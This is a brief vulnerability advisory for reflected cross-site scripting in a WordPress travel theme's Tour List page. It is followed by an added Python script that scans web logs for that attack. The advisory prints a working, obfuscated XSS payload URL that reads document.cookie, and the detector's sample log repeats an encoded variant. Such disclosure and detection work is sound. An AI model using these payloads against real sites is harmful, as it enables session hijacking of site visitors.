The theme does not sanitise the keywords and start_date GET parameters on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.
Payload: https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=<input%2FAutofocus%2F%250D*%2FOnfocus%3Dalert(`m0ze`)%3Balert(document.cookie)%3B%2F%2F>&start_date=<input%2FAutofocus%2F%250D*%2FOnfocus%3Dalert(`m0ze`)%3Balert(document.cookie)%3B%2F%2F>&avaibility=13
m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt
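
Added example, not part of the original advisory or the theme's code: a detection check that scans web server access logs for requests carrying markup in the keywords or start_date parameters, percent-decoding repeatedly so double-encoded sequences such as %250D are normalised first. The /tour-list/ path, the combined log format, the marker regex and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters the advisory names as reflected without sanitisation.
WATCHED = {"keywords", "start_date"}
# Markup indicators: tag delimiters, a double quote, or an inline event handler.
MARKUP = re.compile(r'[<>"]|\bon\w+\s*=', re.IGNORECASE)
# Client IP and request target from a combined-format log line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url):
    """Return the watched parameter names whose decoded value contains markup."""
    hits = set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in WATCHED and MARKUP.search(fully_decode(value)):
            hits.add(name)
    return sorted(hits)

def scan_log(lines):
    """Yield (client_ip, path, params) for each log line that matches."""
    for line in lines:
        m = REQUEST.match(line)
        if m:
            params = suspicious_params(m.group(2))
            if params:
                yield m.group(1), urlsplit(m.group(2)).path, params

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.23 - - [10/Feb/2021:10:00:00 +0000] "GET /tour-list/'
    '?keywords=paris&start_date=2021-03-01&avaibility=13 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Feb/2021:10:00:05 +0000] "GET /tour-list/'
    '?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert(1)%3B%2F%2F%3E'
    '&avaibility=13 HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for ip, path, params in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} markup in: {', '.join(params)}")
```

A hit only shows that markup was sent in a reflected parameter; whether it executed depends on how the page escaped the value on output.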